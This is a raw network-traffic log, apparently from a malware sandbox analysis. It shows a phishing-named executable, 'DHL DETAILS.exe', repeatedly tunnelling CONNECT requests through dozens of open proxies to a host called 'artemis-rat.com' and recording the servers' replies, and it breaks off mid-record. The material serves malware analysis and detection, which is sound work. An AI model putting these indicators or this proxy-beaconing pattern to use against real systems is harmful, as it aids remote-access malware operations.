                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    140192.168.2.550378104.25.184.189806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.838058949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.992250919 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    141192.168.2.549713162.241.158.204529806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.840153933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.950248957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.974061012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.029175997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.117455959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    142192.168.2.550403104.18.234.218806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.840346098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.994524002 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    143192.168.2.55025991.241.217.5890906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.858978033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    144192.168.2.55042034.49.208.221806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.861345053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    145192.168.2.55037735.185.196.3831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.892009974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.089198112 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    146192.168.2.550353194.34.232.107806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.892249107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.197702885 CET442INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 281
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    147192.168.2.55044291.134.140.160496876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.894251108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    148192.168.2.55036313.37.59.9931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.894352913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.193058968 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    149192.168.2.550299120.76.42.20988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.894359112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    150192.168.2.55042843.153.22.29100056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.894556046 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:13.069010973 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:13.069104910 CET160INHTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    151192.168.2.550361211.222.252.18781936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.894885063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    152192.168.2.550385157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.895379066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    153192.168.2.550475104.129.199.5788006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.899624109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.060360909 CET125INHTTP/1.1 407 Unauthorized
                                                                                    Server: Zscaler/6.2
                                                                                    Cache-control: no-cache
                                                                                    Content-Length: 0
                                                                                    Proxy-Authenticate: Negotiate


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    154192.168.2.550374184.178.172.5153036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.902287006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    155192.168.2.550695218.145.131.1824436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.902369976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    156192.168.2.55038694.131.63.4431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.912048101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.397763014 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    157192.168.2.550382172.245.159.177806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.914601088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.473735094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.176882982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.867851973 CET323INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.9.9
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 172
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 39 2e 39 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.9.9</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    158192.168.2.550346185.158.114.14256976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.915977955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    159192.168.2.55037327.96.235.171806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.940546989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.240761042 CET326INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    160192.168.2.550236124.163.236.5473026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.945911884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    161192.168.2.550543104.17.248.164806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.947057009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.101495028 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    162192.168.2.550553172.67.181.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
